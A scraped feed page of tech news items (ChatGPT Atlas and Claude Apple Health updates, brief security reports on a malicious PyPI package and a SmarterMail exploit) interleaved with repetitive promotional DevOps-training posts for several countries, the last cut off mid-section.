Tech

ChatGPT Atlas Gains Tab Groups, Auto Google/AI Search Switching

ChatGPT Atlas Gains Tab Groups, Auto Google/AI Search Switching

OpenAI is rolling out another noteworthy update to ChatGPT Atlas, its AI-powered browser for Mac.


As per the release notes, the latest build introduces tab groups, allowing users to organize their browsing sessions more efficiently. The update also brings fixes for vertical tab "mini mode" and a simplified right-click context menu for tabs.

On the search front, Atlas now features an "Auto" mode that automatically switches between ChatGPT and Google depending on the query. The search results UI has also been refreshed with a new vertical layout that more prominently displays links in answers.

Elsewhere in this update, Safari users migrating to Atlas will now be prompted to install the iCloud passwords extension during onboarding. Other changes include a simplified address bar context menu, crash fixes, updated translations, and support for macOS keyboard text replacements on webpages.

Today's update follows the browser's first major update that came in November. That introduced vertical tabs, iCloud Passkey support, and Google as a default search engine option.

Atlas currently remains available only on macOS, but OpenAI has said Windows, iOS, and Android versions are coming.Tag: ChatGPT
This article, "ChatGPT Atlas Gains Tab Groups, Auto Google/AI Search Switching" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 27 views

reporter

January 22Jan 22

Claude AI iPhone App Can Now Connect to Apple Health in the US

Claude AI iPhone App Can Now Connect to Apple Health in the US

Anthropic's Claude AI chatbot is gaining Apple Health integration, allowing the assistant to access users' health and fitness data directly from their iPhone.


The feature is rolling out in beta this week via the Claude iOS app, Anthropic announced as part of a broader healthcare push. U.S. subscribers on Claude Pro and Max plans can opt in to share their data, including movement, sleep, and activity patterns.

Once connected, Claude can summarize medical history, explain test results, detect patterns across fitness metrics, and help users prepare questions for doctor appointments. HealthEx and Function connectors are also available in beta.

Anthropic says the integrations are "private by design." Users choose exactly what they share, must explicitly opt in, and can revoke access at any time. Health data isn't used to train models, according to the company.

The announcement comes two weeks after OpenAI launched ChatGPT Health with its own Apple Health connector. Both companies stress their tools aren't intended for diagnosis and aren't a substitute for professional medical advice.Tags: Anthropic, Apple Health
This article, "Claude AI iPhone App Can Now Connect to Apple Health in the US" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 30 views

reporter

January 22Jan 22

A Comprehensive Guide to Onsite and Remote DevOps Coaching in Thailand

A Comprehensive Guide to Onsite and Remote DevOps Coaching in Thailand

Introduction: Problem, Context & Outcome
Engineering teams across Thailand face increasing pressure to deliver software faster while keeping systems stable and secure. Many professionals learn DevOps tools individually, yet they struggle to connect those tools into one dependable delivery pipeline. As a result, deployments fail unexpectedly, environments drift, and release cycles slow down. Meanwhile, Thailand continues to expand its digital economy through fintech, e-commerce, cloud adoption, and enterprise modernization initiatives. These changes require DevOps skills that work in real production environments, not just in test setups. A DevOps Trainer in Thailand helps engineers move from fragmented knowledge to practical execution. This blog explains what a DevOps Trainer in Thailand does, why the role matters today, and how structured training improves delivery outcomes for teams and organizations.
Why this matters: Practical DevOps skills reduce operational risks and support reliable software delivery.
What Is DevOps Trainer in Thailand?
A DevOps Trainer in Thailand is an experienced industry professional who teaches DevOps using real-world workflows and delivery scenarios. Instead of focusing only on tools, the trainer explains how development, operations, quality assurance, security, and cloud infrastructure function together throughout the software lifecycle. These trainers help developers understand how code flows from source control to production. They guide DevOps engineers in building scalable CI/CD pipelines. They support QA teams in implementing continuous and automated testing. They also assist cloud and operations teams with automation, monitoring, and observability. In Thailand, DevOps trainers often work with enterprises, startups, and global delivery teams. Their training aligns with Agile practices, cloud platforms, and DevSecOps requirements commonly used in modern projects.
Why this matters: Real-world training prepares teams to handle production challenges confidently.
Why DevOps Trainer in Thailand Is Important in Modern DevOps & Software Delivery
Modern software delivery demands speed, resilience, and security at the same time. Organizations in Thailand release applications frequently while supporting growing users and evolving business needs. A DevOps Trainer in Thailand helps teams meet these expectations through structured DevOps practices. The trainer addresses common problems such as manual deployments, delayed feedback loops, unstable environments, and unclear responsibility between teams. In addition, DevOps training connects CI/CD pipelines with cloud infrastructure, Agile collaboration, and security automation. Without expert guidance, teams often adopt fragmented solutions that break under load. With proper training, teams create repeatable, scalable, and secure delivery systems.
Why this matters: Expert DevOps guidance enables predictable delivery and long-term stability.
Core Concepts & Key Components
DevOps Culture and Collaboration
Purpose: Build shared ownership and accountability across teams.
How it works: Trainers promote transparency, collaboration, and continuous feedback.
Where it is used: Agile teams, enterprise programs, cross-functional delivery units.
Continuous Integration and Continuous Delivery
Purpose: Enable frequent and reliable releases.
How it works: Trainers explain pipeline stages, automated testing, quality checks, and deployments.
Where it is used: Cloud-native applications, SaaS products, enterprise systems.
Infrastructure as Code
Purpose: Standardize infrastructure and reduce configuration drift.
How it works: Trainers introduce version-controlled infrastructure concepts and repeatable environments.
Where it is used: AWS, Azure, and Google Cloud platforms.
Monitoring and Observability
Purpose: Detect issues early and improve reliability.
How it works: Trainers cover metrics, logging, alerting, and tracing strategies.
Where it is used: Production environments and Site Reliability Engineering teams.
DevSecOps Integration
Purpose: Shift security earlier into the delivery lifecycle.
How it works: Trainers integrate security scans and compliance checks into CI/CD pipelines.
Where it is used: Financial systems, regulated industries, enterprise platforms.
Why this matters: Strong core concepts create reliable and scalable DevOps foundations.
How DevOps Trainer in Thailand Works (Step-by-Step Workflow)
A DevOps Trainer in Thailand follows a structured, outcome-driven approach. First, the trainer assesses existing delivery pipelines, tools, and team maturity. Next, the trainer introduces DevOps fundamentals using real operational challenges rather than theoretical models. Then, the trainer maps DevOps practices to the organization’s development, testing, and deployment lifecycle. Teams learn pipeline design, automation planning, and cloud deployment strategies. Monitoring and feedback guide improvements at every stage. Finally, the trainer helps teams document workflows and adopt continuous improvement practices that scale across projects.
Why this matters: A clear workflow ensures sustainable DevOps adoption and measurable progress.
Real-World Use Cases & Scenarios
Organizations throughout Thailand rely on a DevOps Trainer in Thailand to modernize software delivery. Fintech companies use trainers to build compliant CI/CD pipelines. E-commerce platforms depend on trainers to scale cloud infrastructure during traffic spikes. SaaS providers adopt DevOps training to increase release frequency and stability. Developers focus on build and deployment automation. QA teams implement continuous testing. DevOps engineers manage pipelines and infrastructure. SRE and cloud teams strengthen monitoring and incident response. These scenarios consistently lead to faster releases, fewer failures, and stronger system resilience.
Why this matters: Real-world scenarios demonstrate tangible business and delivery impact.
Benefits of Using DevOps Trainer in Thailand
Productivity: Teams reduce manual work and shorten delivery cycles Reliability: Automation lowers deployment and runtime failures Scalability: Cloud-ready systems support growth smoothly Collaboration: Shared responsibility improves communication and alignment Why this matters: Clear benefits justify long-term DevOps investment.
Challenges, Risks & Common Mistakes
Teams sometimes treat DevOps as only a tooling initiative. Others automate too quickly without building strong foundations. Some delay monitoring until production issues arise. A DevOps Trainer in Thailand mitigates these risks by focusing on fundamentals, gradual adoption, and realistic expectations. The trainer also aligns DevOps practices with business goals and compliance requirements.
Why this matters: Awareness prevents wasted effort and unstable systems.
Comparison Table
AspectTraditional ITModern DevOpsDeploymentManualAutomatedRelease FrequencyInfrequentContinuousTeam StructureSiloedCollaborativeInfrastructureStaticCloud-basedTestingManualAutomatedScalabilityLimitedElasticMonitoringReactiveProactiveSecurityLate-stageIntegratedRecoverySlowRapidFeedbackDelayedContinuous Why this matters: The comparison clarifies why DevOps expertise is essential today.
Best Practices & Expert Recommendations
An effective DevOps Trainer in Thailand emphasizes fundamentals before complexity. Automation starts gradually while maintaining visibility and control. Monitoring begins early rather than after incidents occur. Documentation remains consistent and accessible. Furthermore, delivery pipelines align with business objectives and regulatory needs. This balanced approach supports long-term resilience and scalability.
Why this matters: Best practices reduce operational risk and future rework.
Who Should Learn or Use DevOps Trainer in Thailand?
Developers gain confidence in deployment and automation workflows. DevOps engineers refine CI/CD and infrastructure practices. Cloud engineers and SRE teams improve reliability and observability. QA teams adopt continuous testing models. Beginners build strong foundations, while experienced professionals optimize complex systems.
Why this matters: Broad relevance strengthens overall DevOps maturity.
FAQs – People Also Ask
What is a DevOps Trainer in Thailand?
A professional who teaches practical DevOps skills using real delivery workflows.
Why this matters: Clear definitions help learners make informed decisions.
Is DevOps training suitable for beginners?
Yes, trainers tailor learning paths based on experience levels.
Why this matters: Beginners learn progressively and confidently.
Do organizations in Thailand need DevOps trainers?
Yes, to scale delivery and reduce operational risk.
Why this matters: Scalability improves competitiveness.
How long does DevOps training take?
Duration depends on goals and current skill levels.
Why this matters: Planning sets realistic expectations.
Is DevOps relevant for startups?
Yes, it helps startups scale faster and avoid failures.
Why this matters: Early structure prevents future issues.
Do trainers cover cloud platforms?
Yes, AWS, Azure, and Google Cloud.
Why this matters: Cloud skills remain essential.
Is DevSecOps included in training?
Yes, security integrates directly into pipelines.
Why this matters: Early security reduces risk.
Can QA teams benefit from DevOps training?
Yes, through continuous testing and automation.
Why this matters: Early testing improves quality.
Does DevOps training improve system uptime?
Yes, automation and monitoring support reliability.
Why this matters: Reliability protects users.
Is DevOps a good career path in Thailand?
Yes, demand continues to grow across industries.
Why this matters: Skills remain future-ready.
Branding & Authority
DevOpsSchool operates as a globally trusted learning platform delivering enterprise-grade DevOps education with a strong execution focus. Through structured programs, DevOpsSchool supports professionals and organizations seeking DevOps Trainer in Thailand with practical learning paths, proven frameworks, and scalable delivery approaches. Organizations trust this platform because it prioritizes outcomes, clarity, and sustainability.
Why this matters: Trusted platforms ensure consistent and credible skill development.
Rajesh Kumar serves as a senior mentor with more than 20 years of hands-on industry experience. Through Rajesh Kumar, learners gain expert guidance across DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD pipelines, and automation. His mentorship connects learning directly to enterprise execution.
Why this matters: Deep experience accelerates real-world DevOps mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore structured DevOps programs designed for professionals and teams building modern, scalable delivery systems.




View the full article

• 0 comments
• 35 views

reporter

January 22Jan 22

Malicious PyPI Package Impersonates SymPy, Deploys XMRig Miner on Linux Hosts

Malicious PyPI Package Impersonates SymPy, Deploys XMRig Miner on Linux Hosts

A new malicious package discovered in the Python Package Index (PyPI) has been found to impersonate a popular library for symbolic mathematics to deploy malicious payloads, including a cryptocurrency miner, on Linux hosts. The package, named sympy-dev, mimics SymPy, replicating the latter's project description verbatim in an attempt to deceive unsuspecting users into thinking that they areView the full article

• 0 comments
• 56 views

Hacker News

January 22Jan 22

Cut Apple Music iPhone Storage Usage in Minutes – Here’s How

Cut Apple Music iPhone Storage Usage in Minutes – Here’s How

As an Apple Music subscriber, you're able to download songs, playlists, and albums from the Apple Music catalog to your iPhone or iPad for offline listening, but this can gradually eat up your device's storage space over time.


Fortunately the Music app includes a handy feature that can spring into action whenever your device's storage space runs low, and automatically offload songs you haven't played for a while in order to make space for newer ones.

It's called Optimized Storage, and here's how you can enable it.

Launch the Settings app on your iPhone or iPad.
Scroll down to the apps list and select Music.
Under Downloads, tap Optimized Storage.

Toggle the Optimized Storage switch to the "on" position so that it shows green.
Choose a minimum storage amount that you want to keep for music before downloaded songs start being removed from your device.You can also monitor storage space by turning off automatic downloads and making sure to download new songs manually when needed. There's also an option to remove downloaded songs one by one from the Apple Music app if you prefer not to have songs offloaded by Apple automatically. Tag: Apple Music
This article, "Cut Apple Music iPhone Storage Usage in Minutes – Here’s How" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 28 views

reporter

January 22Jan 22

A Comprehensive Guide to Enterprise DevOps Coaching in Singapore

A Comprehensive Guide to Enterprise DevOps Coaching in Singapore

Introduction: Problem, Context & Outcome
Engineering teams in Singapore increasingly struggle to balance speed, reliability, and compliance. Many professionals know DevOps tools in isolation, yet they fail to connect them into a dependable delivery pipeline. Consequently, deployments remain fragile, feedback stays slow, and operations turn reactive. At the same time, Singapore strengthens its position as a regional technology and financial center. Organizations now adopt cloud-native architectures, microservices, and continuous delivery at scale. This transformation raises the need for expert DevOps guidance rooted in real production environments. A DevOps Trainer in Singapore helps teams translate DevOps principles into actionable workflows that perform under real pressure. In this blog, you will understand the role of a DevOps Trainer in Singapore, why the role matters today, and how structured training drives predictable delivery success.
Why this matters: Clear DevOps direction improves stability, speed, and delivery confidence.
What Is DevOps Trainer in Singapore?
A DevOps Trainer in Singapore is a practicing industry expert who teaches DevOps through hands-on, experience-driven learning. Rather than focusing only on tools, the trainer explains how development, operations, testing, security, and cloud infrastructure operate together as one system. These trainers help developers understand how source code moves through builds, tests, and deployments. They guide DevOps engineers in designing CI/CD pipelines. They enable QA teams to adopt continuous testing strategies. They also support cloud and operations teams in automation and observability. In Singapore’s enterprise-heavy environment, DevOps trainers often bring exposure from fintech, SaaS, banking, and large-scale platforms. Their training aligns closely with Agile delivery, cloud adoption, and DevSecOps practices used in real production systems.
Why this matters: Realistic training prepares teams for production challenges, not just theory.
Why DevOps Trainer in Singapore Is Important in Modern DevOps & Software Delivery
Modern software delivery demands rapid change without compromising reliability or security. Organizations in Singapore deploy applications frequently while operating under strict compliance and uptime requirements. A DevOps Trainer in Singapore helps teams meet these demands through structured DevOps practices. The trainer addresses manual deployments, delayed feedback, unstable environments, and unclear ownership. Additionally, DevOps training connects CI/CD pipelines with cloud platforms, Agile collaboration, and security automation. Without expert guidance, teams often implement fragmented solutions that collapse at scale. With proper training, teams build repeatable, scalable, and secure delivery pipelines aligned with enterprise needs.
Why this matters: Expert training enables predictable delivery and long-term operational resilience.
Core Concepts & Key Components
DevOps Culture and Collaboration
Purpose: Create shared ownership and accountability.
How it works: Trainers promote transparency, collaboration, and continuous feedback across teams.
Where it is used: Agile teams, enterprise programs, regulated environments.
Continuous Integration and Continuous Delivery
Purpose: Enable frequent and reliable software releases.
How it works: Trainers explain pipeline stages, automated tests, quality gates, and deployments.
Where it is used: Cloud-native applications, microservices, enterprise systems.
Infrastructure as Code
Purpose: Standardize and automate infrastructure provisioning.
How it works: Trainers introduce version-controlled infrastructure concepts.
Where it is used: AWS, Azure, and Google Cloud platforms.
Monitoring and Observability
Purpose: Detect issues early and improve system reliability.
How it works: Trainers cover metrics, logs, alerts, and tracing practices.
Where it is used: Production systems and Site Reliability Engineering teams.
DevSecOps Integration
Purpose: Shift security earlier in the delivery lifecycle.
How it works: Trainers embed security checks into CI/CD pipelines.
Where it is used: Financial services, government systems, enterprise platforms.
Why this matters: These core elements create resilient and scalable DevOps systems.
How DevOps Trainer in Singapore Works (Step-by-Step Workflow)
A DevOps Trainer in Singapore follows a structured, outcome-focused workflow. First, the trainer evaluates existing processes, tools, and team maturity. Next, the trainer introduces DevOps fundamentals using real operational challenges. Then, the trainer maps DevOps practices to the organization’s development, testing, and deployment lifecycle. Teams learn pipeline design, automation strategies, and cloud deployment approaches. Monitoring and feedback guide improvements at each stage. Finally, the trainer helps teams document workflows and adopt continuous improvement models that scale across teams and projects.
Why this matters: Step-by-step learning ensures sustainable DevOps adoption.
Real-World Use Cases & Scenarios
Organizations across Singapore rely on a DevOps Trainer in Singapore to modernize delivery systems. Banks and fintech companies use trainers to build compliant CI/CD pipelines. SaaS firms depend on trainers to scale Kubernetes environments. Government teams adopt training to improve automation and reliability. Developers focus on build and deployment automation. QA teams introduce continuous testing. DevOps engineers manage pipelines and infrastructure. SRE and cloud teams enhance monitoring and incident response. These scenarios consistently lead to faster releases, fewer failures, and improved stability.
Why this matters: Real-world outcomes demonstrate clear business and delivery impact.
Benefits of Using DevOps Trainer in Singapore
Productivity: Teams reduce manual effort and delivery delays Reliability: Automation minimizes deployment failures Scalability: Cloud-ready systems handle growth smoothly Collaboration: Shared responsibility improves team alignment Why this matters: Measurable benefits justify DevOps investment.
Challenges, Risks & Common Mistakes
Teams often treat DevOps as a tools-only initiative. Others automate too quickly without mastering fundamentals. Some delay monitoring until failures occur. A DevOps Trainer in Singapore reduces these risks by prioritizing foundations, gradual adoption, and realistic expectations. The trainer also aligns DevOps practices with compliance and business goals.
Why this matters: Awareness prevents wasted effort and unstable systems.
Comparison Table
AspectTraditional ITModern DevOpsDeploymentManualAutomatedRelease FrequencyInfrequentContinuousTeam StructureSiloedCollaborativeInfrastructureStaticCloud-basedTestingManualAutomatedScalabilityLimitedElasticMonitoringReactiveProactiveSecurityLate-stageIntegratedRecoverySlowRapidFeedbackDelayedContinuous Why this matters: Clear comparison explains the value of DevOps expertise.
Best Practices & Expert Recommendations
An effective DevOps Trainer in Singapore focuses on fundamentals before complexity. Automation begins gradually and remains visible. Monitoring starts early, not after incidents. Documentation stays consistent and accessible. Furthermore, delivery pipelines align with business objectives and regulatory requirements. This balanced approach supports resilience and scalability over time.
Why this matters: Best practices reduce operational risk and future rework.
Who Should Learn or Use DevOps Trainer in Singapore?
Developers gain clarity around deployments and automation. DevOps engineers refine CI/CD and infrastructure workflows. Cloud engineers and SRE teams improve reliability and observability. QA teams adopt continuous testing practices. Beginners build strong foundations, while experienced professionals optimize complex delivery systems.
Why this matters: Broad applicability strengthens organizational DevOps maturity.
FAQs – People Also Ask
What is a DevOps Trainer in Singapore?
A professional who teaches practical DevOps skills using real delivery workflows.
Why this matters: Clear understanding supports informed learning decisions.
Is DevOps training suitable for beginners?
Yes, trainers customize learning paths based on experience.
Why this matters: Beginners learn progressively and safely.
Do enterprises in Singapore require DevOps trainers?
Yes, to scale delivery while meeting compliance demands.
Why this matters: Scalability improves competitiveness.
How long does DevOps training take?
Training length depends on goals and current skills.
Why this matters: Planning sets realistic expectations.
Is DevOps important for fintech and banking?
Yes, it supports secure and reliable delivery models.
Why this matters: Security and stability remain critical.
Do trainers cover cloud platforms?
Yes, including AWS, Azure, and Google Cloud.
Why this matters: Cloud skills remain essential.
Is DevSecOps part of DevOps training?
Yes, security integrates directly into pipelines.
Why this matters: Early security reduces risk.
Can QA engineers benefit from DevOps training?
Yes, through continuous testing and automation.
Why this matters: Early testing improves quality.
Does DevOps training improve uptime?
Yes, monitoring and automation support reliability.
Why this matters: Reliability protects users.
Is DevOps a strong career path in Singapore?
Yes, demand continues to grow across industries.
Why this matters: Skills stay future-proof.
Branding & Authority
DevOpsSchool operates as a globally trusted education platform delivering enterprise-grade DevOps learning focused on execution. Through structured programs, DevOpsSchool supports professionals and enterprises searching for DevOps Trainer in Singapore with practical learning paths, proven frameworks, and scalable delivery models. Organizations choose this platform because it emphasizes clarity, outcomes, and sustainability.
Why this matters: Trusted platforms ensure consistent and credible learning.
Rajesh Kumar serves as a senior mentor with more than 20 years of hands-on experience across global delivery environments. Through Rajesh Kumar, learners receive guidance in DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD, and automation. His mentoring connects learning directly to enterprise execution.
Why this matters: Deep expertise accelerates real-world mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore enterprise-ready DevOps programs designed for teams and professionals building modern, scalable delivery systems.




View the full article

• 0 comments
• 45 views

reporter

January 22Jan 22

SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release

SmarterMail Auth Bypass Exploited in the Wild Two Days After Patch Release

A new security flaw in SmarterTools SmarterMail email software has come under active exploitation in the wild, two days after the release of a patch. The vulnerability, which currently does not have a CVE identifier, is tracked by watchTowr Labs as WT-2026-0001. It was patched by SmarterTools on January 15, 2026, with Build 9511, following responsible disclosure by the exposure managementView the full article

• 0 comments
• 54 views

Hacker News

January 22Jan 22

A Comprehensive Guide to Enterprise-Grade DevOps Coaching in Pune

A Comprehensive Guide to Enterprise-Grade DevOps Coaching in Pune

Introduction: Problem, Context & Outcome
Many engineering teams in Pune face difficulty when turning DevOps knowledge into reliable production outcomes. Although engineers understand individual tools, they often fail to connect them into a unified delivery pipeline. Consequently, releases become slow, environments drift, and operational issues increase. At the same time, Pune continues to evolve as a major technology and startup hub, where companies aggressively adopt cloud platforms, microservices, and continuous delivery models. This rapid growth creates a strong demand for skilled DevOps guidance rooted in real-world experience. DevOps Trainers in Pune address this challenge by helping professionals apply DevOps practices across the complete software lifecycle. In this blog, you will learn what DevOps Trainers in Pune actually do, why they matter in today’s delivery landscape, and how they create measurable improvement for teams and organizations.
Why this matters: Practical DevOps knowledge improves stability, speed, and delivery confidence.
What Is DevOps Trainers in Pune?
DevOps Trainers in Pune are industry professionals who teach DevOps through practical, experience-driven learning. Instead of focusing only on tools, they explain how development, operations, testing, security, and cloud infrastructure work together as one delivery system. These trainers guide learners through real CI/CD pipelines, automated deployments, monitoring strategies, and cloud operations. They help developers understand deployment flows. They enable operations teams to automate infrastructure. They support QA teams in continuous testing models. Pune-based DevOps trainers often bring strong exposure from IT services, startups, and global enterprises. Their training reflects real project demands and aligns closely with Agile practices, cloud adoption, and modern software delivery expectations.
Why this matters: Realistic training prepares engineers for production environments, not just interviews.
Why DevOps Trainers in Pune Is Important in Modern DevOps & Software Delivery
Modern software delivery demands rapid releases without sacrificing reliability or security. Organizations in Pune deploy applications at high speed while handling scale and compliance. DevOps Trainers in Pune help teams achieve this balance. They address issues such as manual deployments, slow feedback, environment inconsistencies, and weak collaboration. In addition, they connect DevOps learning with CI/CD pipelines, cloud platforms, Agile workflows, and DevSecOps principles. Without structured training, teams often implement fragmented solutions that break under real workloads. With experienced trainers, teams design stable, repeatable, and scalable delivery systems.
Why this matters: Proper training prevents failures and supports long-term delivery maturity.
Core Concepts & Key Components
DevOps Culture and Collaboration
Purpose: Promote shared ownership and faster feedback cycles.
How it works: Trainers encourage collaboration, transparency, and continuous learning.
Where it is used: Agile teams, product-focused companies, enterprise environments.
Continuous Integration and Continuous Delivery
Purpose: Enable frequent and predictable software releases.
How it works: Trainers explain pipeline stages, automation flows, and release controls.
Where it is used: Cloud-native systems, microservices platforms, enterprise applications.
Infrastructure as Code
Purpose: Standardize and automate infrastructure management.
How it works: Trainers teach version-controlled infrastructure concepts.
Where it is used: AWS, Azure, and Google Cloud deployments.
Monitoring and Observability
Purpose: Detect issues early and maintain reliability.
How it works: Trainers cover metrics, logs, alerts, and tracing strategies.
Where it is used: Production operations and Site Reliability Engineering teams.
DevSecOps Integration
Purpose: Embed security within delivery pipelines.
How it works: Trainers integrate security checks into CI/CD workflows.
Where it is used: Financial, regulated, and enterprise-grade systems.
Why this matters: These core components build resilient and scalable DevOps foundations.
How DevOps Trainers in Pune Works (Step-by-Step Workflow)
DevOps Trainers in Pune follow a structured learning approach. First, they analyze existing delivery processes and team maturity. Next, they introduce DevOps fundamentals using real operational scenarios. Then, they map DevOps practices to the organization’s development and deployment lifecycle. Trainers guide teams through CI/CD pipeline design, infrastructure automation, and cloud deployment planning. Monitoring and feedback play a central role throughout each stage. Finally, trainers help teams document workflows and adopt continuous improvement practices that scale.
Why this matters: Structured learning ensures lasting adoption and measurable impact.
Real-World Use Cases & Scenarios
Many IT services companies in Pune rely on DevOps Trainers in Pune to standardize delivery across multiple client environments. Startups use trainers to build scalable CI/CD pipelines from the beginning. Fintech and SaaS organizations adopt DevOps training to ensure compliance and high availability. Developers focus on build and deployment automation. QA teams implement continuous testing. DevOps engineers manage infrastructure and pipelines. SRE and cloud teams improve observability and incident response. These scenarios consistently deliver faster releases and improved system stability.
Why this matters: Real use cases highlight clear business and delivery improvements.
Benefits of Using DevOps Trainers in Pune
Productivity: Teams reduce manual work and delivery delays Reliability: Automation minimizes deployment errors Scalability: Cloud-ready systems grow smoothly Collaboration: Shared responsibility improves teamwork Why this matters: Clear benefits strengthen DevOps return on investment.
Challenges, Risks & Common Mistakes
Teams sometimes treat DevOps as a tool-only initiative. Others rush automation without solid foundations. Some ignore monitoring until failures appear. DevOps Trainers in Pune help teams avoid these mistakes by prioritizing fundamentals, gradual adoption, and realistic goals. They align DevOps strategies with real business needs instead of trends.
Why this matters: Awareness prevents wasted effort and unstable systems.
Comparison Table
AspectTraditional ITModern DevOpsDeploymentManualAutomatedRelease CycleSlowContinuousTeam StructureSiloedCollaborativeInfrastructureStaticCloud-basedTestingManualAutomatedScalabilityLimitedElasticMonitoringReactiveProactiveSecurityLate-stageIntegratedRecoverySlowRapidFeedbackDelayedContinuous Why this matters: The comparison clarifies why DevOps skills remain essential.
Best Practices & Expert Recommendations
Effective DevOps Trainers in Pune emphasize clarity before complexity. They introduce automation gradually and promote strong visibility through monitoring. They encourage documentation and consistent processes. Moreover, they align DevOps pipelines with business and compliance goals. This balanced approach supports long-term scalability and reliability.
Why this matters: Best practices reduce operational risk and future rework.
Who Should Learn or Use DevOps Trainers in Pune?
Developers gain confidence in deployments and automation. DevOps engineers refine CI/CD and infrastructure workflows. Cloud and SRE teams improve reliability and monitoring strategies. QA teams adopt continuous testing practices. Beginners develop structured foundations, while experienced professionals optimize delivery systems.
Why this matters: Broad applicability strengthens overall DevOps maturity.
FAQs – People Also Ask
What are DevOps Trainers in Pune?
They provide hands-on DevOps training based on real workflows.
Why this matters: Clear understanding supports better learning decisions.
Is DevOps training beginner-friendly?
Yes, trainers adapt programs to experience levels.
Why this matters: Beginners learn safely and progressively.
Do organizations in Pune require DevOps trainers?
Yes, to scale delivery and maintain reliability.
Why this matters: Scalability improves competitiveness.
How long does DevOps training usually take?
It depends on goals and current skill levels.
Why this matters: Planning sets expectations.
Is DevOps useful for IT services companies?
Yes, it improves client delivery speed and quality.
Why this matters: Faster delivery builds trust.
Do trainers teach cloud platforms?
Yes, including AWS, Azure, and GCP.
Why this matters: Cloud expertise remains critical.
Is security included in DevOps training?
Yes, through DevSecOps practices.
Why this matters: Security reduces late risks.
Can QA engineers benefit from DevOps training?
Yes, through test automation and CI integration.
Why this matters: Early testing improves quality.
Does DevOps training improve uptime?
Yes, via automation and monitoring.
Why this matters: Reliability protects users.
Is DevOps a strong career path in Pune?
Yes, demand continues to rise.
Why this matters: Skills remain future-proof.
Branding & Authority
DevOpsSchool functions as a globally trusted platform that delivers enterprise-grade DevOps education with a strong focus on real-world execution. Through structured programs, DevOpsSchool supports professionals and organizations seeking DevOps Trainers in Pune by offering practical learning paths, proven methodologies, and scalable delivery frameworks. Organizations trust this platform because it prioritizes outcomes over theory.
Why this matters: Trusted platforms ensure consistent and credible skill development.
Rajesh Kumar serves as a senior mentor with more than 20 years of hands-on experience across global delivery environments. Through Rajesh Kumar, learners gain guidance in DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD, and automation. His mentorship bridges learning and real enterprise execution.
Why this matters: Deep experience accelerates practical mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore enterprise-ready DevOps programs designed for professionals and organizations scaling modern delivery pipelines.




View the full article

• 0 comments
• 35 views

reporter

January 22Jan 22

A Comprehensive Guide to Enterprise-Grade DevOps Coaching in Netherlands

A Comprehensive Guide to Enterprise-Grade DevOps Coaching in Netherlands

Introduction: Problem, Context & Outcome
Engineering teams across the Netherlands face a common challenge. They understand individual DevOps tools, yet they struggle to connect them into a reliable delivery system. Many professionals learn DevOps through fragmented tutorials. As a result, real production issues remain unresolved. Pipelines break. Releases slow down. Operations become reactive instead of proactive. At the same time, Dutch enterprises rapidly adopt cloud-native platforms, Kubernetes, and continuous delivery models. This shift increases demand for experienced DevOps Trainers in Netherlands who teach beyond theory. These trainers help teams apply DevOps in real business environments. This blog explains who DevOps Trainers in Netherlands are, how they operate, and why they matter in modern software delivery. You will also gain clarity on benefits, use cases, risks, and best practices.
Why this matters: Practical DevOps guidance reduces failure and speeds up enterprise transformation.
What Is DevOps Trainers in Netherlands?
DevOps Trainers in Netherlands are seasoned industry professionals who teach DevOps using real delivery scenarios. They focus on how development, operations, security, and quality work together as one continuous workflow. Unlike generic instructors, these trainers bring hands-on experience from enterprise environments. They guide learners through CI/CD pipelines, cloud infrastructure, automation strategies, and monitoring practices. Their training style emphasizes understanding over memorization. They help developers see how code moves to production. They help operations teams embrace automation and observability. DevOps Trainers in Netherlands support individual learners, startups, and large enterprises. They align training with modern Agile and cloud-native delivery models used across Dutch and global organizations.
Why this matters: Hands-on training converts DevOps concepts into production-ready skills.
Why DevOps Trainers in Netherlands Is Important in Modern DevOps & Software Delivery
Modern software delivery demands speed without sacrificing reliability. Organizations release features continuously while maintaining uptime and security. DevOps Trainers in Netherlands help teams achieve this balance. They teach structured pipelines, automated testing, and scalable infrastructure practices. Without expert training, teams misuse tools or copy incomplete solutions. This leads to fragile systems and frequent incidents. Trainers help organizations standardize DevOps workflows aligned with Agile and cloud adoption strategies. As companies in the Netherlands scale globally, trained DevOps professionals enable consistent delivery and reduced operational risk.
Why this matters: Expert training strengthens delivery stability and long-term scalability.
Core Concepts & Key Components
DevOps Culture and Collaboration
Purpose: Create shared responsibility and faster feedback.
How it works: Trainers promote collaboration, shared metrics, and continuous learning.
Where it is used: Agile teams, product organizations, enterprise platforms.
Continuous Integration and Continuous Delivery
Purpose: Enable frequent and reliable releases.
How it works: Trainers explain pipeline stages, automated testing, and controlled deployments.
Where it is used: Cloud applications, microservices, enterprise systems.
Infrastructure as Code
Purpose: Manage infrastructure consistently.
How it works: Trainers introduce version-controlled infrastructure concepts.
Where it is used: AWS, Azure, Google Cloud deployments.
Monitoring and Observability
Purpose: Maintain system health and visibility.
How it works: Trainers teach metrics, logs, alerts, and tracing strategies.
Where it is used: Production systems and SRE operations.
DevSecOps Integration
Purpose: Build security into delivery pipelines.
How it works: Trainers embed security checks early in CI/CD workflows.
Where it is used: Regulated industries and large-scale platforms.
Why this matters: Core DevOps principles create stable and scalable delivery foundations.
How DevOps Trainers in Netherlands Works (Step-by-Step Workflow)
DevOps Trainers in Netherlands follow a structured and practical workflow. They begin by assessing current DevOps maturity and existing bottlenecks. Next, they introduce core DevOps concepts using real-life delivery problems. They then map DevOps practices to the organization’s development lifecycle. Trainers guide teams through pipeline design, automation planning, and deployment strategies. Continuous monitoring and feedback play a key role throughout the process. Finally, trainers help teams document workflows and adopt continuous improvement habits.
